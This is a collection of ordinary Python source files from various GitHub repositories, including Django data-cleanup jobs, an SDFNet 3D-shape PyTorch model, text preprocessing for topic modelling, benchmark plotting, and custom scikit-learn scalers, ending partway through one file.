couple[0].strip().lower() not in forbidden and couple[\n 1].strip().lower() not in forbidden and not couple[0].strip().isnumeric() and not couple[\n 1].strip().isnumeric() and not (couple[0].strip().lower() == couple[1].strip().lower()):\n print(f\"{video.post.slug} -> no couples - fixable: --> {couple[0]} + {couple[1]}\")\n video.state = ContentModelState.active\n\n s1 = Properties(key='spouse_1', value_text=couple[0].title())\n s1.save()\n video.post.properties.add(s1)\n s2 = Properties(key='spouse_2', value_text=couple[1].title())\n s2.save()\n video.post.properties.add(s2)\n\n if len(couple[0]) < 2 or len(couple[1]) < 2:\n video.state = ContentModelState.active_review\n video.save()\n\n if video.state in [ContentModelState.active, ContentModelState.active_review]:\n venue = video.businesses.filter(business_role_type__slug='venue').values_list('business__name',\n flat=True).first()\n video.title = f\"{video.post.properties.filter(key='spouse_1').first().value_text} + \" \\\n f\"{video.post.properties.filter(key='spouse_2').first().value_text} | {str(video.location)} | \" \\\n f\"{venue}\"\n video.save()\n bar()\n\n with alive_bar(Video.objects.count(), \"- checking titles\", length=10,\n bar=\"blocks\") as bar:\n for video in Video.objects.all():\n s = video.title.split('|')\n\n if len(s) < 1 or len(s[0].strip()) < 1 or len(s[0].split(\"+\")) < 2:\n print(f\"{video.post.slug} -> no couple names\")\n if len(s) < 2 or len(s[1].strip()) < 3:\n print(f\"{video.post.slug} -> no location -> {video.title} -> {s[1].strip()}\")\n\n if len(s) < 3 or len(s[2].strip()) < 1:\n print(f\"{video.post.slug} -> no venue\")\n bar()\n\n print(f\"total: {Video.objects.count()}\")\n","repo_name":"Stevenpijei/wedding-site","sub_path":"lstv_be/lstv_api_v1/management/commands/job_prune_post_titles.py","file_name":"job_prune_post_titles.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74627875111","text":"import json\n\nf = open(\"bibleallverses.json\", \"r\")\njson_data = json.load(f)\nbible = json_data[\"bible\"]\nverses = []\nfor item in bible:\n #print(item)\n verse = [item[\"book\"], item[\"chapter\"], item[\"verse\"]]\n verses.append(verse)\nprint(len(verses))\nwith open(\"references.json\", \"w\") as outfile:\n json.dump(verses, outfile)","repo_name":"gesab001/BooksBibleViewGalaxyWatch","sub_path":"reference_generator.py","file_name":"reference_generator.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7504249176","text":"\"\"\"\n1. input = [[1,2,5],[5,2,1],[0,9,6]]\noutput = [[1,5,0],[2,2,9],[5,1,6]]\n\"\"\"\ninput = [[1, 2, 5], [5, 2, 1], [0, 9, 6]]\nn = 0\nresult = []\nfor item in input:\n result.append([x[n] for x in input])\n n += 1\n\nprint(result)\n\n\"\"\"\n2. input: dct_list = ['abc', 'cab', 'abcd', 'dcba', 'abcde']\noutput : {3: ['abc', 'cab'], 4: ['abcd', 'dcba'], 5: ['abcde']}\n\"\"\"\nmy_dict = {}\ndct_list = ['abc', 'cab', 'abcd', 'dcba', 'abcde']\nfor item in dct_list:\n if len(item) not in my_dict:\n my_dict[len(item)] = list([item])\n else:\n my_dict[len(item)].append(item)\n\nprint(my_dict)\n\n\"\"\"\n3.my_str = \"My name is supriya M\"\noutput = \"Ma yirp us siemany M\"\n\"\"\"\nmy_str = \"My name is supriya M\"\n\n\ndef reverse_str(my_str):\n my_list = my_str.split(\" \")\n list2 = []\n n = 0\n rev_str = \"\"\n for item in my_str:\n if item != \" \":\n rev_str = rev_str + item\n rev_str = rev_str[::-1]\n for item in my_list:\n list2.append(rev_str[n:n + len(item)])\n n += len(item)\n return \" \".join(list2)\n\n\nprint(\"the reverse string is ---> {}\".format(reverse_str(my_str)))\n","repo_name":"supriya-mainalli/PythonNotes","sub_path":"interview_questions/global_logic.py","file_name":"global_logic.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10890905290","text":"import numpy\nimport os\nimport linecache\nimport math\n\n__author__ = 'Bryce Woodworth'\n\ndef _mapper(word):\n \"\"\"Takes a word and maps it to the lowercase equivalent\n with punctuation removed.\"\"\"\n punctuation = ',.!?~#()[]-+='\n return word.strip(punctuation).lower()\n\n\ndef stop_remover(filenames, stopwords, outdir):\n \"\"\"Removes the given stop words from the given files,\n as well as punctuation and capitalization,\n and saves the result in the given directory.\n\n Inputs:\n filenames: A list of paths to files to be cleaned\n stopwords: A list of words to be removed\n outdir: The directory to save the cleaned files in\n\n Returns: nothing\n \"\"\"\n for filename in filenames:\n cleaned = \"\"\n with open(filename) as file:\n try:\n for line in file:\n line = map(_mapper, line.split())\n line = filter(lambda w: w not in stopwords, line)\n cleaned += (' '.join(line) + '\\n')\n except UnicodeDecodeError:\n print(filename)\n continue\n\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n with open(os.path.join(outdir, os.path.basename(filename)), 'w') as outfile:\n outfile.write(cleaned)\n\n\ndef find_most_common(filenames, num_words, ignore=[]):\n \"\"\"Finds the n most common words in the given files\n and returns them as a list, ignoring words in the\n ignore list.\n\n Inputs:\n filenames: A list of paths to files to be searched through\n num_words: The number of most common words to find\n ignore: A list of words that should not be considered\n\n Returns: A list of the num_words most common words in filenames\n \"\"\"\n freqs = {}\n for filename in filenames:\n with open(filename) as file:\n try:\n for line in file:\n for word in line.split():\n if word in ignore:\n continue\n if word in freqs:\n freqs[word] += 1\n else:\n freqs[word] = 1\n except UnicodeDecodeError:\n print(filename)\n continue\n\n sort = sorted(freqs.items(), key=lambda x: x[1])[-num_words:]\n sort.reverse()\n return [word for (word, _) in sort]\n\n\ndef word_filter(filenames, vocab, outdir):\n \"\"\"Removes all words that aren't in the vocab\n from filenames and places the modified files in outdir.\n\n Inputs:\n filenames: A list of paths to files to be pruned\n vocab: The vocabulary to prune the files to\n outdir: The path to place the modified files in, using their original names\n\n Returns: void\n \"\"\"\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n for filename in filenames:\n pruned = \"\"\n with open(filename) as file:\n try:\n for line in file:\n line = ' '.join(filter(lambda w: w in vocab, line.split()))\n pruned += line + '\\n'\n except UnicodeDecodeError:\n continue\n\n with open(os.path.join(outdir, os.path.basename(filename)), 'w') as outfile:\n outfile.write(pruned)\n\n\ndef word_bag_reduce(filename, vocname, dictname, size, stopwords=None):\n \"\"\"Treats the input file as a bag of words (formatting specific)\n and outputs its co-occurrence matrix Q, using a vocab\n size of size by removing the least common words overall, and\n optionally removing stopwords from the specified file.\n\n Inputs:\n filename: A path to the bag of words file\n vocname: A path to the indexed vocabulary file\n dictname: A path to a dictionary to filter words by\n size: The number of words to keep\n stopwords: The path to a file containing whitespace-separated stop words,\n or None if no stop words\n\n Returns:\n Q: The word-word co-occurrence matrix\n vocab: The list of words indexed by their Q index\n \"\"\"\n # First get the indices of the stop words, if any\n stops = []\n stop_indices = []\n stop_set = set()\n if stopwords is not None:\n with open(stopwords) as stopfile:\n for line in stopfile:\n stops.extend(line.split())\n\n # Convert from string stopwords to dictionary index stopwords\n with open(vocname) as vocfile:\n lineindex = 1\n for line in vocfile:\n if line.strip() in stops:\n stop_indices.append(lineindex)\n lineindex += 1\n stop_set = set(stop_indices)\n\n # Get the total word counts into a dictionary\n counts = dict()\n with open(filename) as file:\n num_docs = int(file.readline())\n cur_vocab = int(file.readline())\n file.readline()\n\n for line in file:\n split = line.split()\n # only consider words that aren't stopwords\n if split[1] not in stops:\n try:\n counts[split[1]] += int(split[2])\n except KeyError:\n counts[split[1]] = int(split[2])\n\n # Next get all of the dictionary words from dictname\n dictionary = []\n with open(dictname) as dictfile:\n for line in dictfile:\n dictionary.append(line.strip())\n\n # Now use that dictionary to find the most common words\n sort = list(filter(lambda w: linecache.getline(vocname, int(w)).strip() in dictionary, sorted(counts, key=lambda x: counts[x], reverse=True)))\n\n # Get the mapping from sorted index to string\n vocab = list(map(lambda x: linecache.getline(vocname, int(x)).strip(), sort[:size]))\n\n with open(filename) as file:\n file.readline()\n file.readline()\n file.readline()\n\n H = numpy.zeros((size, num_docs)) # The term-by-document matrix\n for line in file:\n split = line.split()\n try:\n ind = sort.index(split[1])\n except ValueError:\n continue\n if ind < size:\n H[ind][int(split[0])-1] += int(split[2])\n\n # recover the word-word co-occurrence matrix Q\n Q = construct_Q(H)\n\n priors = [0.0] * Q.shape[0]\n\n for i in range(len(priors)):\n priors[i] = numpy.sum(Q[i])\n priors = priors / sum(priors)\n\n Qbar = numpy.empty_like(Q)\n for row in range(Q.shape[0]):\n total = numpy.sum(Q[row])\n if total <= 0.0:\n print(\"invalid sum of %d at row %d\" % (total, row))\n Qbar[row] = Q[row] / total\n\n return vocab, priors, Qbar, H\n\n\ndef construct_Q(H):\n \"\"\"\n Constructs the Q matrix from the word-document counts H\n\n :param H: the word-document counts, size V x K\n :return: Q: The estimated word-word co-occurence matrix\n \"\"\"\n Hbar = numpy.empty_like(H)\n Hhat = numpy.zeros((H.shape[0], H.shape[0]))\n n = numpy.sum(H, axis=0)\n\n for col in range(H.shape[1]):\n denom = n[col] * (n[col] - 1)\n if denom <= 0.0:\n print(\"Invalid denominator of %d at column %d. Ignoring.\" % (denom, col))\n else:\n Hbar[:, col] = H[:, col] / math.sqrt(denom)\n Hhat += (numpy.diag(H[:, col]) / denom)\n\n # recover the word-word co-occurrence matrix Q\n return numpy.dot(Hbar, Hbar.transpose()) - Hhat\n\n\n\nif __name__ == '__main__':\n base_dir = 'datasets/SentenceCorpus/unlabeled_articles'\n stop_file = 'datasets/SentenceCorpus/word_lists/stopwords.txt'\n clean_dir = 'datasets/SentenceCorpus/cleaned'\n prune_dir= 'datasets/SentenceCorpus/pruned'\n vocab_size = 1000\n\n with open(stop_file) as stopfile:\n stops = [stop.strip() for stop in stopfile]\n\n dirs = [os.path.join(base_dir, dir) for dir in os.listdir(base_dir)\n if os.path.isdir(os.path.join(base_dir, dir)) and not dir.startswith('.')]\n\n allfiles = [os.path.join(direct, file) for direct in dirs for file in os.listdir(direct)\n if os.path.isfile(os.path.join(direct, file)) and not file.startswith('.')]\n\n for dir in dirs:\n files = [os.path.join(dir, file) for file in os.listdir(dir)\n if os.path.isfile(os.path.join(dir, file)) and not file.startswith('.')]\n cleandir = os.path.join(clean_dir, os.path.basename(dir))\n prunedir = os.path.join(prune_dir, os.path.basename(dir))\n stop_remover(files, stops, cleandir)\n files = [os.path.join(cleandir, file) for file in os.listdir(cleandir)\n if os.path.isfile(os.path.join(cleandir, file)) and not file.startswith('.')]\n print(\"Files have been stripped of stop words\")\n\n voc = find_most_common(allfiles, vocab_size)\n word_filter(files, voc, prunedir)\n print(\"Files have been stripped of words not in vocab\\n\")\n\n\n\n\n","repo_name":"BryceWoodworth/InteractiveAnchors","sub_path":"preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":8851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"177488202","text":"import torch\nimport torch.nn as nn\nfrom torchvision import models\nimport config\n\nclass SDFNet(nn.Module):\n ''' SDFNet 3D regressor class\n\n Args:\n input_point_dim: dimension of input points, default to 3\n latent_dim: dimension of conditioned code, default to 256\n size_hidden: dimension of points block hidden size, default to 256\n pretrained: whether the encoder is ImageNet pretrained, \n default to False\n\n '''\n def __init__(self, input_point_dim=3, latent_dim=256, size_hidden=256, pretrained=False):\n super().__init__()\n\n self.encoder = Encoder(latent_dim, pretrained=pretrained)\n self.decoder = Decoder(input_point_dim, latent_dim, size_hidden)\n\n def forward(self, points, inputs):\n assert points.size(0) == inputs.size(0)\n batch_size = points.size(0)\n latent_feats = self.encoder(inputs)\n score = self.decoder(points, latent_feats)\n return score\n\nclass Encoder(nn.Module):\n def __init__(self, latent_dim, pretrained):\n super().__init__()\n self.features = models.resnet18(\\\n pretrained=pretrained)\n # Reinitialize the first conv layer for D+N inputs\n if config.path['input_image_path'] is None:\n self.features.conv1 = nn.Conv2d(4,\\\n 64,\\\n kernel_size=7,\\\n stride=2,\\\n padding=3,\\\n bias=False)\n self.features.fc = nn.Sequential()\n self.fc = nn.Linear(512, latent_dim)\n\n def forward(self, x):\n feat = self.features(x)\n latent_feat = self.fc(feat)\n return latent_feat \n\nclass Decoder(nn.Module):\n def __init__(self, input_dim, latent_dim, size_hidden):\n super().__init__()\n self.fc_p = nn.Conv1d(input_dim, size_hidden, 1)\n \n self.block0 = CResnetBlockConv(latent_dim, size_hidden)\n self.block1 = CResnetBlockConv(latent_dim, size_hidden)\n self.block2 = CResnetBlockConv(latent_dim, size_hidden)\n self.block3 = CResnetBlockConv(latent_dim, size_hidden)\n self.block4 = CResnetBlockConv(latent_dim, size_hidden)\n\n self.bn = CBatchNorm(latent_dim, size_hidden)\n\n self.fc_out = nn.Conv1d(size_hidden, 1, 1)\n\n self.actvn = nn.ReLU()\n\n def forward(self, p, c):\n p = p.transpose(1, 2)\n batch_size, D, T = p.size()\n net = self.fc_p(p)\n\n net = self.block0(net, c)\n net = self.block1(net, c)\n net = self.block2(net, c)\n net = self.block3(net, c)\n net = self.block4(net, c)\n\n out = self.fc_out(self.actvn(self.bn(net, c)))\n out = out.squeeze(1)\n\n return out\n\nclass CBatchNorm(nn.Module):\n def __init__(self, latent_dim, feature_dim):\n super().__init__()\n self.latent_dim = latent_dim\n \n self.feature_dim = feature_dim\n self.conv_gamma = nn.Conv1d(self.latent_dim, self.feature_dim, 1)\n self.conv_beta = nn.Conv1d(self.latent_dim, self.feature_dim, 1)\n self.bn = nn.BatchNorm1d(self.feature_dim, affine=False)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n nn.init.zeros_(self.conv_gamma.weight)\n nn.init.zeros_(self.conv_beta.weight)\n nn.init.ones_(self.conv_gamma.bias)\n nn.init.zeros_(self.conv_beta.bias)\n\n def forward(self, x, c):\n latent = c\n assert(x.size(0) == c.size(0))\n assert(c.size(1) == self.latent_dim)\n\n # c is assumed to be of size batch_size x latent_dim x T\n if len(c.size()) == 2:\n c = c.unsqueeze(2)\n\n # Affine mapping\n gamma = self.conv_gamma(c)\n beta = self.conv_beta(c)\n\n # Batchnorm\n net = self.bn(x)\n out = gamma * net + beta\n\n return out\n\nclass CResnetBlockConv(nn.Module):\n def __init__(self, latent_dim, size_in, size_hidden=None, size_out=None):\n super().__init__()\n if size_hidden is None:\n size_hidden = size_in\n if size_out is None:\n size_out = size_in\n\n self.size_in = size_in\n self.size_hidden = size_hidden\n self.size_out = size_out\n\n self.bn_0 = CBatchNorm(\\\n latent_dim, self.size_in)\n self.bn_1 = CBatchNorm(\\\n latent_dim, self.size_hidden)\n\n self.fc_0 = nn.Conv1d(self.size_in, self.size_hidden, 1)\n self.fc_1 = nn.Conv1d(self.size_hidden, self.size_out, 1)\n self.actvn = nn.ReLU()\n\n nn.init.zeros_(self.fc_1.weight)\n\n def forward(self, x, c):\n net = self.fc_0(self.actvn(self.bn_0(x, c)))\n dx = self.fc_1(self.actvn(self.bn_1(net, c)))\n\n return x + dx\n \n","repo_name":"rehg-lab/3DShapeGen","sub_path":"SDFNet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"72"} +{"seq_id":"34779622536","text":"import glob\r\nimport pandas as pd \r\n\r\npath = './data_files/'\r\nfiles = glob.glob(path + '*.csv')\r\n\r\nframes = []\r\n\r\nfor file in files: \r\n # Frame per file\r\n df = pd.read_csv(file, index_col=None, sep=',', header=0)\r\n print(df)\r\n frames.append(df)\r\n\r\n# Combine frames \r\nframe = pd.concat(frames, axis=0, ignore_index=True)\r\n\r\n# Write to 1 CSV\r\nframe.to_csv(path + \"combined_data.csv\")\r\n","repo_name":"maxwellpark/python_etl_utils","sub_path":"data_preparation/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16920117956","text":"import pandas as pd\nimport numpy as np\nfrom datetime import timedelta\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.style as style\n\ndf = pd.read_csv(\"out.csv\")\n\nmask = df.tool == \"cbmc\"\nmask_cvc4 = df.tool == \"cbmc-cvc4\"\ndf.loc[mask, \"assertions_reached\"] = np.NaN\ndf.loc[mask_cvc4, \"assertions_reached\"] = np.NaN\n\ndelta = timedelta(minutes=30)\ndf[\"elapsed_time\"].replace({\"-1\": delta}, inplace=True)\ndf = df.astype({'elapsed_time': 'str'})\ndf[\"elapsed_time\"] = df[\"elapsed_time\"].map(pd.Timedelta)\ndf[\"elapsed_time_secs\"] = df[\"elapsed_time\"].map(lambda x: x.total_seconds())\ndf = df.replace(-1, np.NaN)\ndf[\"branch percentage\"] = df[\"branches_covered\"] / df[\"total_branches\"]\n\nprint(df.dtypes)\ngrouped = df.groupby([\"program\", \"tool\"]).mean()\ngrouped = grouped[[\"branches_covered\",\n \"total_branches\", \"assertions_reached\", \"elapsed_time_secs\"]]\ngrouped.columns = [\"branches covered\", \"total branches\",\n \"assertions reached\", \"time (s)\"]\nbigtable = grouped.to_latex()\nwith open(\"bigtable.tex\", \"w+\") as f:\n f.write(bigtable)\nstyle.use('ggplot')\nsns.set_context(\"paper\", font_scale=1)\nsorted_tools = sorted(list(set(df[\"tool\"])))\nax = sns.catplot(\n x=\"tool\", # x variable name\n y=\"elapsed_time_secs\", # y variable name\n # hue=\"tool\", # group variable name\n data=df, # dataframe to plot\n kind=\"bar\",\n order=sorted_tools)\nplt.xticks(rotation=30, horizontalalignment='right')\nplt.tight_layout()\n\nplt.savefig('elapsed.png', dpi=300)\n\nsns.catplot(\n x=\"tool\", # x variable name\n y=\"assertions_reached\", # y variable name\n # hue=\"tool\", # group variable name\n data=df, # dataframe to plot\n kind=\"bar\",\n order=sorted_tools)\n\nplt.xticks(rotation=30, horizontalalignment='right')\nplt.tight_layout()\nplt.savefig('assertions.png', dpi=300)\n\nsns.catplot(\n x=\"tool\", # x variable name\n y=\"branches_covered\", # y variable name\n # hue=\"tool\", # group variable name\n data=df, # dataframe to plot\n kind=\"bar\",\n order=sorted_tools)\n\nplt.xticks(rotation=30, horizontalalignment='right')\nplt.tight_layout()\nplt.savefig('cover.png', dpi=300)\n\nsns.catplot(\n x=\"tool\", # x variable name\n y=\"branch percentage\", # y variable name\n # hue=\"tool\", # group variable name\n data=df, # dataframe to plot\n kind=\"bar\",\n order=sorted_tools)\n\nplt.xticks(rotation=30, horizontalalignment='right')\nplt.tight_layout()\nplt.savefig('coverp.png', dpi=300)\n\n# plt.show()\n\ngrouped = df.groupby([\"program\", \"tool\"]).max()\nwinners = grouped.groupby(\"program\").idxmax()\nwinners[\"branches_covered\"] = winners[\"branches_covered\"].map(lambda x: x[1])\nwinners[\"branch percentage\"] = winners[\"branch percentage\"].map(lambda x: x[1])\nwinners[\"assertions_reached\"] = winners[\"assertions_reached\"].map(lambda x: x[1])\nwinners = winners[[\"branches_covered\", \"branch percentage\", \"assertions_reached\"]]\nbranch_wins = winners[\"branches_covered\"].value_counts()\nbranchp_wins = winners[\"branch percentage\"].value_counts()\nass_wins = winners[\"assertions_reached\"].value_counts()\nwins = {}\nfor tool in sorted_tools:\n wins[tool] = {}\n if tool in ass_wins:\n wins[tool][\"Assertions Reached\"] = ass_wins[tool]\n else:\n wins[tool][\"Assertions Reached\"] = 0\n if tool in branch_wins:\n wins[tool][\"Branches Covered\"] = branch_wins[tool]\n else:\n wins[tool][\"Branches Covered\"] = 0\n if tool in branchp_wins:\n wins[tool][\"Percentage of Total Branches\"] = branchp_wins[tool]\n else:\n wins[tool][\"Percentage of Total Branches\"] = 0\nwins_df = pd.DataFrame(wins)\nprint(wins_df)\nwinstable = wins_df.T.to_latex()\nwith open(\"wins.tex\", \"w+\") as f:\n f.write(winstable)\n\ngrouped = df.groupby([\"tool\"]).sum()\nprint(grouped)\n","repo_name":"dylanjwolff/program-analysis-project","sub_path":"scripts/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28988063384","text":"import sys\nimport threading\nimport time\nimport queue\n\n\ndef myThread(queue):\n while True:\n try:\n time.sleep(2)\n raise Exception(\"Exception Thrown In Child Thread {}\".format(threading.current_thread()))\n except:\n queue.put(sys.exc_info())\n\nqueue = queue.Queue()\nmyThread = threading.Thread(target=myThread, args=(queue,))\nmyThread.start()\n\nwhile True: \n try:\n exception = queue.get()\n except Queue.Empty:\n pass\n else:\n print(exception)\n break\n","repo_name":"elliotforbes/Concurrency-With-Python","sub_path":"Chapter 06/threadException.py","file_name":"threadException.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"72"} +{"seq_id":"30743570745","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0015_userextended_photo_or_video'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='userextended',\n old_name='photo_or_video',\n new_name='gender',\n ),\n ]\n","repo_name":"bharathramh92/easy-ecom","sub_path":"accounts/migrations/0016_auto_20150814_1727.py","file_name":"0016_auto_20150814_1727.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8872030785","text":"fname = input('Enter File: ')\r\nif len(fname) < 1 :\r\n fname = 'clown.txt'\r\n\r\nhand = open(fname)\r\n\r\ndic = open(fname)\r\n\r\ndic = dict()\r\nfor lin in hand:\r\n lin = lin.strip()\r\n #print(lin)\r\n words=lin.split()\r\n #print(words)\r\n\r\n\r\nfor word in words:\r\n #if word not in dic:\r\n # dic[word] = 1\r\n #else:\r\n # dic[word] = dic[word] + 1\r\n dic[word] = dic.get(word,0) +1\r\n #print(word, dic[word])\r\n\r\nlargest = 0\r\ntheword = None\r\nfor key, value in dic.items():\r\n print(key, value)\r\n if value > largest:\r\n largest = value\r\n theword = key\r\n\r\nprint('Done',theword,largest)","repo_name":"slihump/study","sub_path":"python/dictionaries_ex2.py","file_name":"dictionaries_ex2.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74584651113","text":"\nfrom typing import List\n\nfrom scipy.special import boxcox\nfrom scipy.special import expit\n\nfrom ai4water.backend import np, sklearn\nfrom ai4water.utils.utils import jsonize\n\nSKMinMaxScaler = sklearn.preprocessing.MinMaxScaler\nSKStandardScaler = sklearn.preprocessing.StandardScaler\nSKRobustScaler = sklearn.preprocessing.RobustScaler\nSKPowerTransformer = sklearn.preprocessing.PowerTransformer\nSKQuantileTransformer = sklearn.preprocessing.QuantileTransformer\nSKFunctionTransformer = sklearn.preprocessing.FunctionTransformer\nSKMaxAbsScaler = sklearn.preprocessing.MaxAbsScaler\ncheck_is_fitted = sklearn.utils.validation.check_is_fitted\n\n# todo\n# inverse hyperbolic transformation: effective with many zeros\n\nclass ScalerWithConfig(object):\n \"\"\"Extends the sklearn's scalers in such a way that they can be\n saved to a json file an d loaded from a json file\n\n Methods\n --------\n - config\n - form_config\n \"\"\"\n\n @property\n def config_paras(self) -> list:\n raise NotImplementedError\n\n def get_params(self):\n raise NotImplementedError\n\n @classmethod\n def from_config(cls, config: dict):\n \"\"\"Build the scaler/transformer from config\n\n Arguments:\n config : dictionary of parameters which can be used to build transformer/scaler.\n\n Returns :\n An instance of scaler/transformer\n \"\"\"\n scaler = cls(**config['params'])\n setattr(scaler, '_config', config['config'])\n setattr(scaler, '_from_config', True)\n for attr, attr_val in config['config'].items():\n setattr(scaler, attr, attr_val)\n return scaler\n\n def config(self) -> dict:\n \"\"\"Returns all the parameters in scaler/transformer in a dictionary\"\"\"\n if self.__class__.__name__ == 'MyFunctionTransformer':\n pass\n else:\n check_is_fitted(self)\n\n _config = {}\n for attr in self.config_paras:\n _config[attr] = getattr(self, attr)\n\n return {\"params\": self.get_params(),\n \"config\": _config}\n\n\nclass MinMaxScaler(SKMinMaxScaler, ScalerWithConfig):\n\n @property\n def config_paras(self):\n return ['scale_', 'min_', 'n_samples_seen_', 'data_min_', 'data_max_', 'data_range_']\n\n\nclass StandardScaler(SKStandardScaler, ScalerWithConfig):\n\n @property\n def config_paras(self):\n return ['scale_', 'n_samples_seen_', 'mean_', 'var_', 'n_features_in_']\n\n\nclass RobustScaler(SKRobustScaler, ScalerWithConfig):\n\n @property\n def config_paras(self):\n return ['scale_', 'center_']\n\n\nclass PowerTransformer(SKPowerTransformer, ScalerWithConfig):\n \"\"\"This transformation enhances scikit-learn's PowerTransformer by allowing\n the user to define `lambdas` parameter for each input feature. The default\n behaviour of this transformer is same as that of scikit-learn's.\n \"\"\"\n def __init__(self, method='yeo-johnson', *,\n rescale=False,\n pre_center:bool = False,\n standardize=True,\n copy=True,\n lambdas=None):\n \"\"\"\n lambdas: float or 1d array like for each feature. If not given, it is\n calculated from scipy.stats.boxcox(X, lmbda=None). Only available\n if method is box-cox.\n pre_center:\n center the data before applying power transformation. see github [1] for more discussion\n rescale:\n For complete documentation see scikit-learn's documentation [2]\n\n .. [2]\n https://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.PowerTransformer.html\n\n .. [1]\n https://github.com/scikit-learn/scikit-learn/issues/14959\n \"\"\"\n if lambdas is not None:\n if isinstance(lambdas, float):\n lambdas = np.array([lambdas])\n lambdas = np.array(lambdas)\n # if given, lambdas must be a 1d array\n assert lambdas.size == len(lambdas)\n lambdas = lambdas.reshape(-1,)\n assert method != \"yeo-johnson\"\n\n self.lambdas = lambdas\n self.rescale = rescale\n self.pre_center = pre_center\n\n super(PowerTransformer, self).__init__(method=method,\n standardize=standardize,\n copy=copy)\n\n @property\n def config_paras(self):\n return ['lambdas_', 'scaler_to_standardize_',\n 'pre_center_config_', 'rescaler_config_', 'n_features_in_']\n\n @classmethod\n def from_config(cls, config: dict):\n \"\"\"Build the scaler/transformer from config\n\n Arguments:\n config : dictionary of parameters which can be used to build transformer/scaler.\n\n Returns :\n An instance of scaler/transformer\n \"\"\"\n scaler = cls(**config['params'])\n setattr(scaler, '_config', config['config'])\n setattr(scaler, '_from_config', True)\n\n _scaler_config = config['config'].pop('scaler_to_standardize_')\n setattr(scaler, '_scaler', StandardScaler.from_config(_scaler_config))\n\n rescaler = config['config'].pop('rescaler_config_')\n if rescaler:\n setattr(scaler, 'rescaler_', MinMaxScaler.from_config(rescaler))\n else:\n setattr(scaler, 'rescaler_', None)\n\n pre_standardizer = config['config'].pop('pre_center_config_')\n if pre_standardizer:\n setattr(scaler, 'pre_centerer_', Center.from_config(pre_standardizer))\n else:\n setattr(scaler, 'pre_centerer_', None)\n\n for attr, attr_val in config['config'].items():\n setattr(scaler, attr, attr_val)\n\n if isinstance(scaler.lambdas_, float):\n scaler.lambdas_ = [scaler.lambdas_]\n return scaler\n\n def _fit(self, X, y=None, force_transform=False):\n \"\"\"copying from sklearn because we want to use our own StandardScaler\n which can be serialzied. and optionally with user provided with lambda\n parameter.\"\"\"\n X = self._check_input(X, in_fit=True, check_positive=True,\n check_method=True)\n\n if not self.copy and not force_transform: # if call from fit()\n X = X.copy() # force copy so that fit does not change X inplace\n\n X = self._maybe_rescale(X, force_transform)\n\n X = self._maybe_precenter(X, force_transform)\n\n optim_function = {'box-cox': self._box_cox_optimize,\n 'yeo-johnson': self._yeo_johnson_optimize\n }[self.method]\n if self.lambdas is None:\n with np.errstate(invalid='ignore'): # hide NaN warnings\n self.lambdas_ = np.array([optim_function(col) for col in X.T])\n else: # take user defined lambdas\n self.lambdas_ = self.lambdas\n\n if self.standardize or force_transform:\n transform_function = {'box-cox': boxcox,\n 'yeo-johnson': self._yeo_johnson_transform\n }[self.method]\n for i, lmbda in enumerate(self.lambdas_):\n with np.errstate(invalid='ignore'): # hide NaN warnings\n X[:, i] = transform_function(X[:, i], lmbda)\n\n setattr(self, 'scaler_to_standardize_', None)\n if self.standardize:\n self._scaler = StandardScaler(copy=False)\n if force_transform:\n X = self._scaler.fit_transform(X)\n else:\n self._scaler.fit(X)\n\n setattr(self, 'scaler_to_standardize_', self._scaler.config())\n\n return X\n\n def _maybe_rescale(self, X, force_transform):\n self.rescaler_config_ = None\n if self.rescale:\n rescaler = MinMaxScaler()\n self.rescaler_ = rescaler\n if force_transform:\n X = rescaler.fit_transform(X)\n else:\n X = rescaler.fit(X)\n\n self.rescaler_config_ = rescaler.config()\n return X\n\n def _maybe_precenter(self, X, force_transform=False):\n self.pre_center_config_ = None\n if self.pre_center:\n pre_centerer = Center()\n self.pre_centerer_ = pre_centerer\n if force_transform:\n X = pre_centerer.fit_transform(X)\n else:\n X = pre_centerer.fit(X)\n\n self.pre_center_config_ = pre_centerer.config()\n return X\n\n def inverse_transform(self, X):\n \"\"\"Apply the inverse power transformation using the fitted lambdas.\n\n The inverse of the Box-Cox transformation is given by::\n\n if lambda_ == 0:\n X = exp(X_trans)\n else:\n X = (X_trans * lambda_ + 1) ** (1 / lambda_)\n\n The inverse of the Yeo-Johnson transformation is given by::\n\n if X >= 0 and lambda_ == 0:\n X = exp(X_trans) - 1\n elif X >= 0 and lambda_ != 0:\n X = (X_trans * lambda_ + 1) ** (1 / lambda_) - 1\n elif X < 0 and lambda_ != 2:\n X = 1 - (-(2 - lambda_) * X_trans + 1) ** (1 / (2 - lambda_))\n elif X < 0 and lambda_ == 2:\n X = 1 - exp(-X_trans)\n\n Parameters\n ----------\n X : array-like of shape (n_samples, 